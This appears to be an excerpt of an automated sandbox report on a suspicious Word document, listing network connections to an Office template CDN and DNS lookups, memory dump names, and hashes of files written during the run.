| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 138.167.16.2.in-addr.arpa | udp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 24.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/2380-0-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-3-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-2-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-1-0x00007FFE1682D000-0x00007FFE1682E000-memory.dmp
memory/2380-4-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-6-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-5-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-7-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-10-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-12-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-13-0x00007FFDD47B0000-0x00007FFDD47C0000-memory.dmp
memory/2380-14-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-15-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-16-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-9-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-18-0x00007FFDD47B0000-0x00007FFDD47C0000-memory.dmp
memory/2380-17-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-8-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-11-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IFM58U6K\eWjsdnqwKllAbeP[1].doc
| MD5 | f7e4812fd83625cdfe19159f6d2fefa9 |
| SHA1 | 15a20c40783e01f60135619b8358d1f1df0beb14 |
| SHA256 | fa22ac754b94cc3093cad88b03f0d2b1aa4b4c52a494c7a0b1db761acffbb5e7 |
| SHA512 | 51bfab21f0d18c4c7bcdfff776cb771949bdf29f43dab37767fb6d7cc64bb8996d730b39aa949b5f12d991dcd1e7cbbd953301581877bf165fd03c5ed33ef23d |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | e47017d2b78537263e5431b0b627bda4 |
| SHA1 | 0dcff64f35b70fdf4352837eec0600bd14b8ce24 |
| SHA256 | 40828054e5a965fa3fe7a16cb5d702b4b8dfc9ea551aa06fd5cab8902041f6b6 |
| SHA512 | 249c2c157ccad274f07b6a060402a83e6aa72e743600e7801ca75a9acac81ad055875385b3932f417922705708917cc56d91341c7c2240fcfc2247bb6e951b13 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2380-86-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-87-0x00007FFE1682D000-0x00007FFE1682E000-memory.dmp
memory/2380-88-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-92-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-91-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-90-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-95-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-94-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-93-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-96-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-89-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-97-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD10A6.tmp\iso690.xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |
memory/2380-601-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-602-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-604-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-603-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-605-0x00007FFE16790000-0x00007FFE16985000-memory.dmp